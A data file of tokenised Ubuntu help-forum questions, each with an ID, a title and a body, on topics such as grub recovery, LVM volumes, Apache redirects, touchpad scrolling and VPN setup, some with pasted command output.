24084	where can i find an automatic day-night color balance adjuster similar to f.lux/redshift that works with multiple monitors ?	i tried f.lux , and i like what it does ( automatically adjust the color balance of your monitors depending on time of day ) , but it seems to work on only 1 of my monitors . can i configure it to work on all of them ? if not , what other apps can i use that do ? i 'm currently running ubuntu 10.04 lts with 2 nvidia quadro nvs 420s connected to 4 dell 2007fps .
24087	how to test samba/afp configuration remote server ?	i am using ubuntu as desktop and server os . when i am logged in to the server via ssh on the terminal to change the smb/afp configuration , i can only test the configuration from the server over terminal . is there a way to tunnel the connection over ssh ( no vpn , only one ssh port is open on the firewall ) so that i also could test the connection from my ubuntu or os x desktop host ?
24094	how to recover grub after upgrade from 9.10 to 10.04 ?	after i have done an upgrade from ubuntu 9.10 to ubuntu server 10.04 , the server stops with a grub rescue message , how can i recover my grub without reinstalling ?
24096	handle doc/docx templates on a headless server to produce pdfs preferably without using openoffice.org	on a production web server i have to produce letters based on a template i got in ms-word binary format . i use php and for the search and replace task i found phpword , which can handle docx files , so i converted the template to openxml on my local workstation . unfortunately the output also is docx . the goal is to produce a single pdf for the user to download so she can print out a bunch of letters at once very easily . now i need to find a way to either : search and replace text in a pdf file convert docx to pdf without loss of formatting edit the original doc template without loss of formatting and without using com convert docx to doc without loss of formatting ( which seems nearly impossible for the template looks good in word but technically how the formatting is done is a big pile of ... ) so i could convert it using wvpdf what i do n't want to use besides openoffice.org are web services . i 'm aware of phplivedocx but i do n't want to depend on an external service for performance , availability , security reasons . also buying a piece of software is n't an option in this case ( ca n't influence that ) . running on a public facing web server i do n't want to pull openoffice.org - not even headless , as it will pull around 160mb of compressed ( ! ) binaries and best practice is not no load binaries you do n't really need on a public facing server . though it 's a last resort to use oo.o i want to make sure i have ruled out any other options there may have been . the host os is centos 5.5 . where can i go from here ? regards , luxifer
24101	using lvm , how can i tell which logical volume is near full ?	i am getting errors that my disk is nearly full , but i am using three logical volumes , and would need to know which i need to extend . i still have 50gb unassigned . up until now i always extend all logical volumes together , but now i wanted to really only extend the needed volume . [ edit : output from the asked commands ] 11:58:27|nva @ nvaws [ ~ ] > df filesystem 1k-blocks used available use % mounted on /dev/md0 5766196 5094104 379180 94 % / none 1800512 264 1800248 1 % /dev none 1806624 768 1805856 1 % /dev/shm none 1806624 112 1806512 1 % /var/run none 1806624 0 1806624 0 % /var/lock /dev/mapper/nvaws-db 5160576 1971944 2926488 41 % /var/lib/postgresql /dev/mapper/nvaws-usr 19223252 4957612 13289156 28 % /usr /dev/mapper/nvaws-home 61929340 29253760 29534180 50 % /home 11:58:32|nva @ nvaws [ ~ ] > 12:01:13|nva @ nvaws [ ~ ] > sudo vgdisplay -- - volume group -- - vg name nvaws system id format lvm2 metadata areas 1 metadata sequence no 8 vg access read/write vg status resizable max lv 0 cur lv 3 open lv 3 max pv 0 cur pv 1 act pv 1 vg size 145.93 gib pe size 4.00 mib total pe 37359 alloc pe / size 26880 / 105.00 gib free pe / size 10479 / 40.93 gib vg uuid bbudpk-ulao-ttes-g2ll-8jyi-xh74-j7xn8n 12:01:35|nva @ nvaws [ ~ ] > sudo lvdisplay -- - logical volume -- - lv name /dev/nvaws/home vg name nvaws lv uuid bb5jzc-1jep-eptl-wkzi-20c1-1fcb-2ewm3p lv write access read/write lv status available # open 1 lv size 60.00 gib current le 15360 segments 4 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv name /dev/nvaws/usr vg name nvaws lv uuid 5xtai2-vwqo-iehj-nrg5-jnbk-ce5z-35ahyj lv write access read/write lv status available # open 1 lv size 40.00 gib current le 10240 segments 2 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv name /dev/nvaws/db vg name nvaws lv uuid ahxv6p-vpjy-araw-bhcz-opgz-2y9x-zhjlp5 lv write access read/write lv status available # open 1 lv size 5.00 gib current le 1280 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 12:01:50|nva @ nvaws [ ~ ] > 12:02:03|nva @ nvaws [ ~ ] > sudo pvdisplay -- - physical volume -- - pv name /dev/md1 vg name nvaws pv size 145.93 gib / not usable 960.00 kib allocatable yes pe size 4.00 mib total pe 37359 free pe 10479 allocated pe 26880 pv uuid ctym85-ad2e-60i4-pze5-9gxo-t4pc-dr7g9r 12:02:06|nva @ nvaws [ ~ ] > i hope you guys can make more of that than i can : ) one remark : i extended the home logical volume yesterday , and added 10gb . it seemed the most likely candidate . so i guess that will show itself .
24105	mouse cursor freezes randomly with intel gma 950	i 'm using ubuntu 10.10 . it 's installed using wubi , dual booting with windows . it 's a fresh install . at random times , the mouse cursor freezes and i ca n't click anything on the screen . i can move the mouse but i ca n't click . an example : occurred when selecting text . so i use the keyboard to to reboot system . then it is back to normal after reboot . i tried unplugging-plugging the mouse , but this did n't work . pc : asus laptop with intel gma 950 graphic card . a4 tech optical mouse . ubuntu 10.10 completely updated and upgraded . how can i get around this ?
24107	zenity script for zsync	can someone make a simple zenity script for zsync which just takes the location of the file to be synced and the zsync file and show progress ?
24108	is there a powerpoint ( ppt ) to text/html converter ?	is there a ppt to text/html converter for ubuntu/*nix ?
24109	why is gnome-session and gconfd-2 using 10+ % cpu each ?	gnome-session and gconfd-2 are each using about 10 % cpu , with me doing nothing on the desktop . the other day gnome-session got up to 25 % ( i suspect it was maxing out a single core of the quad core cpu ) , and i needed to reboot to get it back to normal . it seems to creep up over a few hours or so . how can i troubleshoot this ? this is on 10.04 64-bit
24110	disable all user accounts ?	i 'm not sure all accounts are disabled on my computer , including samba-guest , and i need to disable all accounts except the one i 'm using . how can i disable them all ?
24116	what is the all_proxy environment variable used for ?	when i type set | grep -i proxy i see all environmental variables which refers to proxy settings . i understand the meaning of http_proxy and ftp_proxy but what is all_proxy used for and where can i change it ? it has been added to my environment variables when i used gnome-network-properties application . why socks is specified there as a protocol ? all_proxy=socks : //my_proxy : port/
24117	how will the launcher/button work on a touch panel ?	i 'm not sure if unity has a design problem . if the launcher is hidden you can bring it to front by moving the mouse over the home button or hit the super key . so far , so good . but what is on tablet devices with touch panel ? intuitively i would `` click '' in the corner to show the launcher , but a click will open the dash . how should that work on a touch device ? do i have to `` drag '' my finger into the corner ? will touch devices have a `` menu button '' ? will there be a gesture to show the launcher ?
24119	will ubuntu make use of packagekit ?	the primary design goal of packagekit is to unify all the software graphical tools used in different distributions . has ubuntu any plans for adoption ?
24121	what about the performance enhancement when using an ssd as the main disk ?	i 'm planning to buy a new pc and i am thinking about using an ssd as the main disk . i 'd also use a standard spinning disk and i 'd mount it to /home . to the people already using such a setup : does this induce a practical , noticeable enhancement in performance ? i think that access times , rather than transfer rates , are the more useful feature of ssd 's . i would like to know if they have a noticeable effect on a desktop installation of ubuntu . thanks in advance !
24128	about the use of dotted hostname with avahi	hi i recently discovered avahi . it help you when you when to resolve hostname for the local network . but in my situation i 've got a issue . i decided to host a machine called `` a.alpha '' and a another called `` b.aplha '' . in a near futur i will also use some machine called `` a.beta '' and `` b.beta '' . my probleme is that from `` a.alpha '' i can resolv `` a.alpha.local '' hostname , but currently i ca n't resolv `` a.aplha.local '' from b.alpha . so when i will decide to use the `` .beta '' extension , i will have some issues . is it normal that the machine `` a.alpha '' does n't expos the entire hostname to mdns ? i know i can change the naming method ( saying use a-alpha instead of a.alpha ) . but i like it this way . so the quesiton is : is it possible to use dotted name in the /etc/hostname and to resolve it using avahi ?
24133	is it possible to do a remote wipe of a system ?	my office had a break-in over the weekend , and several laptops were stolen . mine was n't one of them , but i 'm curious - the owners of the stolen computers ( windows and mac ) are all talking about remote wipe software . is there anything like this for linux ? something that would allow me to remotely wipe my system if it 's ever lost or stolen .
24137	can not mount android phone and sync with banshee	i ca n't get my lg optimus one to sync with banshee . i read somewhere that the root needs to have an empty file called '.is_audio_player ' . i did that and it still does n't mount . i ran dmesg however and it appears that the card is unmounting before i even have a change to run banshee . [ 7250.321359 ] usb 1-1.4 : new high speed usb device using ehci_hcd and address 10 [ 7250.444795 ] scsi12 : usb-storage 1-1.4:1.0 [ 7251.567946 ] scsi 12:0:0:0 : direct-access multiple card reader 1.00 pq : 0 ansi : 0 [ 7251.568839 ] sd 12:0:0:0 : attached scsi generic sg3 type 0 [ 7252.232433 ] sd 12:0:0:0 : [ sdc ] 15564800 512-byte logical blocks : ( 7.96 gb/7.42 gib ) [ 7252.233299 ] sd 12:0:0:0 : [ sdc ] write protect is off [ 7252.233306 ] sd 12:0:0:0 : [ sdc ] mode sense : 03 00 00 00 [ 7252.233309 ] sd 12:0:0:0 : [ sdc ] assuming drive cache : write through [ 7252.235658 ] sd 12:0:0:0 : [ sdc ] assuming drive cache : write through [ 7252.235666 ] sdc : sdc1 [ 7252.239132 ] sd 12:0:0:0 : [ sdc ] assuming drive cache : write through [ 7252.239140 ] sd 12:0:0:0 : [ sdc ] attached scsi removable disk [ 7272.573437 ] usb 1-1.4 : usb disconnect , address 10 suggestions ?
24149	sharing directories are not shown	i use ubuntu on my mac with vmware fusion . i setup share folders . however , i do n't have anything in /mnt/hgfs i did have the shared directories , but they 're not there . what 's wrong with this , and how can i link them back again ?
24151	how do i get dangerdeep to work ?	has anyone been able to get danger from the deep ( dangerdeep ) to work under ubuntu 10.04 for longer than 5 minutes or so without crashing & hanging up ? ? ? the graphics are superb & it looks like it would be a great game , if it would just work ! ! ! i have downloaded the `` latest '' files from source forge site , but still no luck .
24156	enable two-finger scrolling on alps touchpad	how can i set up two-finger scrolling on an alps touchpad that does n't support multiple fingers ? the relevant output from xinput list is as follows : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=13 [ slave pointer ( 2 ) ] and the output of synclient -l is : parameter settings : leftedge = 153 rightedge = 870 topedge = 115 bottomedge = 652 fingerlow = 12 fingerhigh = 14 fingerpress = 127 maxtaptime = 180 maxtapmove = 56 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 139 emulatetwofingerminw = 7 vertscrolldelta = 25 horizscrolldelta = 25 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.156495 trackstickspeed = 40 edgemotionminz = 14 edgemotionmaxz = 79 edgemotionminspeed = 1 edgemotionmaxspeed = 102 edgemotionusealways = 0 touchpadoff = 1 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 2 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 1 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 99 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 14 pressuremotionmaxz = 79 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0
24157	sync only selected subfolders to ubuntuone ?	i 've just set up ubuntuone , and am ready to sync . my documents folder has the option to sync , but not the individual subfolders . i do n't want to sync my entire documents folder - is there any way to select only specific subfolders to sync ?
24171	how can i keep a wireless card 's radio powered off by default ?	my desktop 's pci wireless card is always scanning for available wireless networks , but i only rarely use it . can i keep the radio turned off until i need it ?
24177	banshee smooth start/pause playing ?	is there any plugin to make banshee start playing , pause tracks smooth ? rhythmbox has such an option , but u ca n't find it in banshee .
24181	how to create file/folder sync functionality ( similar to dropbox ) ?	i think with time it will become possible to use a dropbox locally on my linux/unix/windows server . but for now , i would like to synchronize ubuntu/windows xp/7 machines with linux server ( linux file server ) . does anybody have positive solution for dropbox-like sync software in ubuntu ?
24182	bzr eclipse plugin not configurable	i 'm relatively new to eclipse . i 'm currently running bzr 2.2.1 and eclipse 3.5.2 ( galileo ) . following the directions at : http : //wiki.bazaar.canonical.com/bzreclipse/installation i get to the point where it tells me the plugin has been successfully installed , but when i attempt to configure it at window -- > preferences -- > team -- > bazaar , there 's no `` bazaar '' there . team shows cvs , file contents , ignored resources and models . ( nothing useful under cvs . ) nothing in ~/workspace/.metadata/.log about bzr either . i 've uninstalled and reinstalled the plugin a few times , to no avail . is there a more thorough way to uninstall that plugin without removing everything else that 's been installed ? is there somewhere else i should be looking for the source of trouble ? i did n't see anything promising on launchpad , but may not have looked deep enough .
24185	bash keybindings that match those of gedit ?	i want to have the same keybindings in gedit and in bash . namely all the selections , also cut , copy and paste . i know there are some important ones that are already taken ( ctrl+c , ctrl+w , etc ) , still ... i want to have the same workflow in my text editor and shell of choice . anyone has got around this ?
24187	support trendnet tew-643pi wireless n network card	has anyone been able to get a trendnet tew-643pi wireless n card working under ubuntu ? if so , what drivers did you use and where did you find them ? i have this card and would really like to be able to use it in my computer . i found drivers that may work but do n't know how to get ubuntu to recognize the drivers . i have tried the additional drivers option but can not seem to get ubuntu to pick up the drivers .
24196	how can i create a symlink to the location that ubuntu 10.10 mounts a cd ?	in ubuntu 10.10 , when i insert a cd or dvd into my optical drive , the system mounts the cd in a folder called /media/xyz where xyz is the disk 's label . this has cause problems with wine , as in order for an application to verify that an application 's cd is present , wine uses a symlinks to point to a mounted cd 's folder . in this case , that folder must be /media/xyz , but when using a different application , the folder would be different . i would like to know if there is a way to create a symlink that will always point to the mounted folder from a given /dev/cdrom* device , or how to force the system to always mount cds to the same address ( i.e . /media/cdrom ) .
24197	how can i install commonly used developer tools ?	is there a meta-package for installing commonly used developer tools such as cmake , autoconf , g++ , etc. ? the intent is to have roughly the same range of command-line tools as one has after installing xcode and the mac sdk on apple .
24199	how do i remove icons for other drives on the unity bar ?	my hdd is split into multiple partitions . they each have an icon on the unity bar . is there a way to remove them from the bar ?
24201	how can i detect and delete all lost configuration folders ?	over the time there is an increasing number of hidden .configuration folders in my home folder . many of these come from applications i only installed for testing or from applications that i do n't use any more . i would not mind really but these folders do clutter my home , and worse than that sum up to as much as 80 gbytes by now . as there are also applications i never heard of ( at least i ca n't remember i had installed them ) i hesitate to delete them . is there a way to find out which folders came from purged applications ? may there even be a way to auto-remove a configuration folder when purging ( not removing ) the application that created it ?
24202	how do i resize my emacs22 window ?	i tried searching for answers but ca n't find any . i 'm running ubuntu 10.04 lts and have emacs22 installed : ii emacs22 22.2-0ubuntu9 the gnu emacs editor ( emacs 22 ) ii emacs22-bin-common 22.2-0ubuntu9 the gnu emacs editor 's shared , architecture dependent file ii emacs22-common 22.2-0ubuntu9 the gnu emacs editor 's common infrastructure ii emacsen-common 1.4.19ubuntu1 common facilities for all emacsen i find that i can not resize the outer frame ( x window ) of the emacs session . when i move the mouse to the corner of the window , it does n't change into the resize icon ... . help !
24207	installing ubuntu on unallocated space between many partitions	i 've been trying to install ubuntu on some unallocated space , but i 'm getting confused with the manual partition setup . i did n't want to try the other options for it suggested that everything on my drive would be erased ( but i might be wrong ) i have an old ( ish ) laptop with a 60gb hard-drive . theres a windows 7 partition of 30gb , followed by 20gb of unallocated space , then hp 's windows recovery partition of under 10gb . do i need to format the empty space in windows first ? what 's the recommended method in this case ?
24208	how can i automatically mute the volume at every boot ?	sometimes i forget to enable mute before shutting down my laptop . can i set it up to be muted by default every time ubuntu boots , before the login screen is displayed ? when i try dor 's suggestion of sudo alsactl store , the settings stored in /var/lib/alsa/asound.state are lost on the next reboot . something is using this file to automatically save the current volume settings every time i reboot .
24213	why does libreoffice look old ?	why does libreoffice look like this ? looks old ...
24217	why is my display name in ubuntu software center some weird set of letters ?	in usc , after i submit a review , my display name is `` bnxdcty '' ... a swell name , but where did it come from ? i have checked the ubuntu single sign on page , verified my nickname on there , changed it to something else and back again for good measure , but still my reviewer name is somehow still `` bnxdcty '' . i even unauthorized ubuntu software center and then re-opened it/authorized it to my account . does this just appear as this to me and others see my correct user nickname , because it seems most other people have their ubuntu single sign on nickname correctly displayed ? it does n't bother as much as it confuses me . i just know it will be something stupid in my account settings that everyone knows but me .
24218	lost the config of my monitor once i connected it to a kvm switch	i used to have a monitor ( acer 20 '' , al2017 ) connected to the external video port of my laptop . everything was great and i could get a rather high resolution available when setting it under ubuntu ( all versions ) . but since i connected it to a kvm , the monitor is no more recognized , and i can not go beyond 1024x768 . my video adapter is an intel chipset 9xx from an older pentium core 2 duo laptop . the same monitor , using another video chipset ( intel 82g33/g31 rev 02 ) is properly detected through the switch box . looks to me like the video chipset is not the best , and i can live with this . i see that i have no xorg.conf , and i understand that i would need to generate one so i can then use it to force the available modes on the x system . how can i generate the xorg.conf file for my intel video chip , so i can use it then ? merci : - )
24222	how exactly does gnome manage laptop suspend events ?	the reason i ask is that , while suspend under lid closure and fn-f4 work perfectly in the ubuntu ( gnome ) desktop , i can not get them to work when using a different window manager ( fvwm ) on my thinkpad x201 . i thought this was taken care of by gnome-power-manager , but when running gnome-power-manager within fvwm , i get no suspend from lid closure or fn-f4 . i tried starting other processes as well , like gnome-settings-daemon , but this had no effect . i also tried fiddling with acpi settings , without sucess .
24224	on the netbook edition ( unity ) , firefox is taking up full screen , covering menu and its own controls	on my dell mini with 10.10 netbook edition , i have run into a problem where firefox covers the whole screen and there is no way to get to any other windows except by minimizing . alt+space does not allow me to move or resize . rebooting did not help . i ended up removing the .mozilla directory which solved it , but lost all my settings . in case it matters , i 'm using 2 monitors . any info on this ?
24226	accidentally overlapped the gnome and unity interfaces . now they are causing my menues to glitch badly . help !	okay . so i am a supernoob to linux and consiquently ubuntu ( version 10.10 ) . i saw that i could use the synaptics manager to download the unity interface . i did n't realize that when i went to install and apply unity that it would not automatically unistall gnome . now everything is glitching within the gnome/unity interface and i am clueless as to how to remove either one of them . help ! ! !
24229	is there an rss feed of ubuntu release torrent files	a lot of torrent search engines have the ability to provide an rss feed of matches , allowing you to set up torrent programs to download items which are published on the feed . this is useful for watching releases of things . the problem with doing this through a random search engine for ubuntu is that you usually get too many torrents as it picks up different custom versions , and other software with the name in the title/description . see : http : //www.mininova.org/rss/ubuntu so i was wondering if there was an rss feed somewhere that only loads up the official torrent files for releases ? so from the responses , there does n't appear to be an existing rss feed that does what i am after .
24231	turn off all sounds from websites	often , i am listening to music of my choosing . is there a way to preemptively turn off all sounds originating from websites ? i do n't want to click the 'mute ' button once the page loads . and sometimes , it wo n't even have a mute . : -/ i use chromium and firefox . ~~edit~~ i use xfce , so my menu options are different . is this a gnome-specific utility ? or , what is the command for this utility ?
24232	can i develop unity while running maverick ( 10.10 ) ? or do i have to run natty ?	i 've just joined the ubuntu unity developers bazaar repository and am eager to get started on hacking the code ! do i need to run natty to be able to do this ? or can i simply use maverick ? i 'd prefer to be able to work on maverick because it is stable .
24235	macbook pro compatibility , multitouch	how is the hardware compatibility for the 2010 macbook pros ? does the trackpad multitouch gesture work with 10.10 ? is it oversensitive ? and for anyone that has a relatively new macbook pro that is running ubuntu , how is the general experience coming from an osx environment ?
24236	using checkpoint snx with rsa securid software token to connect to vpn	i have a fairly specific issue that i 'm hoping someone else out in the community has had to tackle with success . my company uses checkpoint vpn clients on windows xp machines with rsa securid software to generate the tokens . the beauty is that once you generate a token code on the software , you can enter it into any machine trying to connect via vpn and with your username get connected . so , i 've got ubuntu 10.10 32bit on a tower and formerly on a laptop . through several posts around the web , i was able to get snx installed on the laptop , plug in my server connection information and be asked for a password only to have the connection fail . i used to debug mode and was able to see that the application was trying to and failing at writing a registry value , but i believe that to be a symptom of a different issue , even though i tried to find a way to remedy that . i 'm wondering if anyone out there is on a similar configuration and was able to connect with snx using an rsa token ? if so , what steps did you take to setup and what problems/solutions did you encounter ?
24238	why is .trash-0 using up so much space ?	i want to know why it is using up so much space and why its contents are hidden ?
24239	why is ubuntu 11.04 not shipping with mono 2.8	mono 2.8 was released on the 22nd august 2010 this is before ubuntu 10.10 was released however ubuntu 11.04 is shipping with mono 2.6 which is really very old now . why is this ?
24240	login to a network domain	i have a laptop which is dual boot with windows xp and ubuntu 10.10 . on windows it always logs into the domain and i am able to connect to over ethernet since it is based on the domain . however on my ubuntu i use hostname as ubuntu which is default . how do i ensure that it uses the same hostname and domain as in windows . is there a way to migrate the settings from windows ? thanks madhava
24241	will unity launcher have applets ?	the panel applets have been removed from gnome3 and unity . will there be some applets for unity launcher , like the applets on awn and docky ?
24250	how to feed kernel messages as kde notification system	is there a way to get the kernel messages into the kde notification system ? i want to see in kde when my kernel detected a problem .
24251	tiny program to register work hours	i 'm searching for a tiny application to register my working hours so when i come to work and power on my pc it register my entrance and as a power off my pc it register me left . i know it 's as simple as adding a note in gedit but i want it automated , phproject has a timer application as you start a task you push start and as you finish calculate time to register fot task , i 'm searching for such small timer . thanks
24256	is it possible to access the xampp on vmware workstation ?	i have ubuntu 10.10 and installed xampp on it . also i have windows 7 installed via vmware workstation 7.1.3 . i do my delelopment work on ubuntu . i want to use ie-tester for testing on all versions of internet explorer . i access my site in ubuntu as http : //localhost/mysite my question is ... ... is it possible for me to see the output of this site in the windows 7 installation of vmware workstation ? if yes how ? kindly help .
24258	will i be able to turn off unity launcher	i heard that unity launcher will have to be on the left side , but i like the osx look with awn on the bottom . using both awn and launcher would look ugly . will i be able to completely turn off ( not hide ) the launcher ?
24261	how do i install a cx8800 tv tuner 's firmware ?	the cx8800 tv tuner is supported in the kernel but when computer starts it says that firmware is not found . there is an unofficial firmware that can be downloaded and copied into /lib/firmware to make the card work . should i report this missing file as a bug ?
24265	nautilus bookmarks and smb shares work with non-root user	i 'm having a problem with nautilus in ubuntu 10.10 when i open nautilus as common user , it shows bookmarks and the bookmarks that point to smb windows shares work fine . however , if i start nautilus as root , it does not show bookmarks , and if i try to browse a smb share directly ( by pressing ctrl+l and inserting an address like smb : //enrique @ 10.x.x.x/backups/ ) it does n't work and gives me an error that it could n't be found .
24266	error while loading shared libraries , file too short	from one of my customers i got an application . when i try to run it i got following error error while loading shared libraries : ./libvtkwidgets.so.5.4 : file too short in my project structure i see following : -rwxrwxrwx 1 tomasz tomasz 20 2011-02-01 10:44 libvtkwidgets.so -rwxrwxrwx 1 tomasz tomasz 22 2011-02-01 10:44 libvtkwidgets.so.5.4 -rwxrwxrwx 1 tomasz tomasz 2147103 2011-02-01 10:44 libvtkwidgets.so.5.4.2 is my shared library libvtkwidgets corrupted ? how to solve that error ?
24269	how to disable the wifi using network-manager permanently ?	how to disable the wifi on boot ? i 'm using network-manager to manage the wifi connection and when i disable this , setting is temporary to the current session . exists therefore a method to make persistent settings for network-manager ? thanks
24270	dependency walker for ubuntu	is there a tool like windows dependencywalker for ubuntu ? i would like to see all shared libraries my executable depends on .
24278	applying languages / locale selectively : is it possible ?	i am a dutch user and prefer the my local date & time format , system wide . i have no trouble speaking or understanding english and find it very useful to have the rest of my system configured in english to make my life easier when i need to google a term , for example . is it possible to apply the a local date/time/currency/etc . format to the system , while maintaining english menu & dialog captions ?
24282	accessing main menu	i removed my main menu from the applications menu and want to access it . how can i do this through the command line ? i 'm using ubuntu 10.10 .
24285	connecting with a bsnl broadband internet	i am unable to connect my broadband connection with ubuntu . the connection works fine when i use windows 7 . however , when i use ubuntu i am not able to access the internet . i followed all the steps mentioned in various sites and still could not find a solution . i have installed ubuntu 8.04 hardy heron on my system . the interface eth0 is not at all detected and when i go to system- > administrator- > network in the menu i do not getting an option for wired connection . only the wireless connection and point to point connection tabs are available .
24287	monitor resolution messed up , monitor is unknown	is there anyway to reset my monitor ? my moitor is using the xorg.conf file . i use 10.04 , without any graphics card . my monitor is an acer x193w , with a native resolution of 1440x900 . this is my xorg.conf file : section `` screen '' identifier `` configured screen device '' device `` configured video device '' monitor `` test '' defaultdepth 16 subsection `` display '' depth 16 modes `` 1440x900_60.00 '' endsubsection endsection # section `` device '' # identifier `` configured video device '' # horizsync # vertrefresh # endsection i still cant view the native resolution , even when defined in the xorg file . an way i can revert to the default , or delete some files , to make the system detect the monitor again ? my last resort is the cvt method , and adding it to the xrandr file . edit : i use intel drivers . my /proc/fb contains 0 vga16 vga
24290	how to connect to windows pptp vpn ?	the vpn server gave me an exe file - connection manager - to connect to the server . instead , i created a pptp vpn connection under nm-applet , entering only host , username & password . later i figured out there were more options that needed to be set . i extracted the .exe file contents , and found a .cms file with some options that looked relevant , but i did n't know how to set them under ubuntu . here is the file content http : //pastebin.com/fmgkfbcs
24297	how do i get a cardscan 60 ii working with sane ?	i have a cardscan 60 ii device and installed sane in my ubuntu 10.10 laptop . the problem is i ca n't make scanimage find the device . quote : $ sudo sane-find-scanner # sane-find-scanner will now attempt to detect your scanner . if the # result is different from what you expected , first make sure your # scanner is powered up and properly connected to your computer . # no scsi scanners found . if you expected something different , make sure that # you have loaded a kernel scsi driver for your scsi adapter . found usb scanner ( vendor=0x08f0 [ corex technologies corporation ] , product=0x1000 [ corex cardscan 60 ] , chip=lm9832/3 ) at libusb:006:002 # your usb scanner was ( probably ) detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . # not checking for parallel port scanners . # most scanners connected to the parallel port or other proprietary ports # ca n't be detected by this program . but i ca n't find the device : $ sudo scanimage -l no scanners were identified . if you were expecting something different , check that the scanner is plugged in , turned on and detected by the sane-find-scanner tool ( if appropriate ) . please read the documentation which came with this software ( readme , faq , manpages ) .
24302	vmware and ubuntu ?	would a vm workstation running a client of windows xp or windows 7 run faster in ubuntu than on a windows 7 pc ?
24305	is there a way to change the `` application '' , `` places '' and `` system '' menus texts with 3 icons ?	i would like to put the top panel in the left . it would became a more beautiful thing if i could change the `` application '' , `` places '' and `` system '' menus texts by 3 icons . is it possible ? how ?
24309	installing gdm on headless server edition	i have ubuntu server running on a headless box , which is right now , almost entirely doing only software raid and feels a little underused . i 'd like to get into using ubuntu as a desktop a little more . what do i need to do ( install/etc . ) to get gnome while keeping the box itself headless ? i 'm not sure which packages to install or which steps to take . i figure i 'll just use x over the network ( xming or the like ) but something like nx might work .
24311	how well does a ati mobility radeon hd 6370 graphics card work ?	i`m going to buy new laptop with ati mobility radeon hd 6370 graphic card , and i want to ask could be any problems using ubuntu on my laptop with this card ?
24315	how to create a file containing info from another file ?	i am trying to create a file contating the info from my /etc/passwd file but can not seem to get it to work . can anyone help me out ?
24316	apache 301 redirection from one domain to another	i 'm trying to set a redirection in my virtualhost configuration for my website . so far i am able to redirect non www trafficto the www address like this : < virtualhost : *:80 > serveralias www.gcbeauce.com rewriteengine on rewritecond % { http_host } ^guidedescommercesdebeauce\.com $ [ nc ] rewriterule ^ ( . * ) $ http : //www.guidedescommercesdebeauce.com $ 1 [ r=301 , l ] but what i also want is to redirect the old domain to this new one . i have tried adding : rewriteengine on rewritecond % { http_host } ^guidedescommercesdebeauce\.com $ [ nc ] rewritecond % { http_host } ^gcbeauce\.com $ [ nc ] rewriterule ^ ( . * ) $ http : //www.guidedescommercesdebeauce.com $ 1 [ r=301 , l ] but nothing happens . am i missing something here ?
24317	how to convert ubuntu cursor to windows and conversely ?	is it possible to convert ubuntu cursor theme to windows .cur and .ani . and make ubuntu cursor theme from windows .cur & .ani files ? if so , how thanks : )
24324	how do i get flash 10.2 rc + crystal hd for hw accelerated video to work ?	i have a netbook with a n450 atom and a bcm70012 aka crystal hd card . on windows 7 i can play hd flash video with very little cpu usage because of the rc of flash 10.2 . i did some reading and saw posts claiming that the crystal hd card is finally supported by the newer flash 10.2 rc in ubuntu but i ca n't get it to work . i can confirm that flash 10.2 is loaded and used , and there 's even a hw acceleration option that is enabled in the settings but performance is horrible . from what i read , the crystal hd card is supposed to be enabled on 10.10 by default - i do n't know if it is . i tried installing drivers for it in various ways but hd flash video is still a slideshow so does anyone have it working ? if so , how 'd you set it up ?
24325	is a disk/ata timeout exception dangerous ?	i have a few hard drives in mdadm raid 5 configured to go to standby after a few minutes of inactivity . ( using hdparm.conf spindown_time . ) at irregular intervals i get messages like these in dmesg : [ 1840.251661 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen [ 1840.251722 ] ata4.00 : failed command : smart [ 1840.251758 ] ata4.00 : cmd b0/d5:01:06:4f : c2/00:00:00:00:00/00 tag 0 pio 512 in [ 1840.251759 ] res 40/00:14:50:2e:04/00:00:02:00:00/40 emask 0x4 ( timeout ) [ 1840.251858 ] ata4.00 : status : { drdy } [ 1840.251888 ] ata4 : hard resetting link [ 1840.600742 ] ata4 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 1840.601521 ] ata4.00 : configured for udma/133 [ 1840.601547 ] ata4 : eh complete [ 337877.713988 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen [ 337877.714019 ] ata4.00 : failed command : smart [ 337877.714038 ] ata4.00 : cmd b0/d5:01:06:4f : c2/00:00:00:00:00/00 tag 0 pio 512 in [ 337877.714039 ] res 40/00:04:90:10:81/00:00:00:00:00/40 emask 0x4 ( timeout ) [ 337877.714089 ] ata4.00 : status : { drdy } [ 337877.714107 ] ata4 : hard resetting link [ 337878.063085 ] ata4 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 337878.063743 ] ata4.00 : configured for udma/133 [ 337878.063764 ] ata4 : eh complete i think the exception is caused by smartd when a drive does not wake up quickly enough . there are no issues ( that i can tell ) in accessing the drives normally through the file system - it takes a few seconds longer than normal when they are asleep , but there are no exceptions . is this something i should worry about , as a potential symptom on something that could corrupt a drive over time ? or can i safely ignore it as part of normal operation ? edit : by request : smartctl -a for sdaand sde , both disks are members of the array . if ata4is the same as scsi-4 then sde is the one that gave the error above , according to /dev/disk/by-path .
